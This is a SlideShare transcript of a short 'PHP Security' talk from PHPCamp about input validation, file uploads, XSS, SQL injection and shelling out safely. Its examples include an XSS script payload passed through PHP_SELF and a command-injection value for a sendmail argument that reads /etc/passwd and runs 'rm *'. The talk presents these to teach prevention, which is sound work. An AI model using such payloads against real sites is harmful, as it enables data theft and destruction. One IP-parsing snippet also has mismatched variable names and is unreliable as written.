Your SlideShare is downloading. ×
0
Php Security
Php Security
Php Security
Php Security
Php Security
Php Security
Php Security
Php Security
Php Security
Php Security
Php Security
Php Security
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Php Security

2,342

Published on

presentation given by uttam in PHPCamp

presentation given by uttam in PHPCamp

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,342
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
95
Comments
0
Likes
3
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. PHP Security by Uttam Kumar Email:- [email_address] Mobile:- 9730791715
  • 2. What is Security?
    • measurement…
    • safety…
    • protection…
  • 3. Secure Web Applications
    • web security issues have to do with:
      • hacker attacks
        • denial of service
        • server hijacking
      • common threats
      • compromise of data
  • 4. PHP & Security
    • a growing language…
    • a major concern…
  • 5. Never trust the web…
    • Input data validation
      • register_globals = OFF
      • $_REQUEST[] big NO NO …
      • type casting input data
        • No isNumeric() if data is numeric [locale problem]
        • regularExp if data is string
      • Path validation
        • Always use basename()
  • 6. Never trust the web…
    • Content size validation
      • use server side max length validation
      • File Upload
        • Check destination file size with $_FILES[‘name’][‘size’]
        • I think Browser MIME header is reliable right ?
          • Use getImageSize() in case of image
        • External source upload like Avtar
          • Make a local copy if path/of/file submitted from a URL.
  • 7. XSS attack
      • Can lead to embarrassment.
      • Session take-over.
      • Password theft.
      • User tracking by 3 rd parties
  • 8. XSS attack
    • Prevention is better than cure
      • Use striptags()
        • No tag allowance please
      • Use htmlentities()
      • Is $_SERVER safe ?
        • Can be set…
        • Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo
        • $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo;
        • $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo
      • IP based info
        • Use HTTP_X_FORWARDED_FOR
        • Use long2ip()
          • $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]);
          • $sValidIp = long2ip(ip2long(array_pop($ipss)));
  • 9. SQL Injection WWW
      • Arbitrary query execution
      • Removal of data.
      • Modification of existing values.
      • Denial of service.
      • Arbitrary data injection.
  • 10. Calling External Programs Sometimes you need to call external programs (using system( ), exec( ), popen( ), passthru( ), or the back-tick operator), this is extreemly dangerous if the program name or any of its arguments are based on user input. Instead use escapeshellarg( ) or escapeshellcmd( ) so that users can’t trick the system into executing arbitrary commands. <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
  • 11. Questions…????
  • 12. Thank You !!

×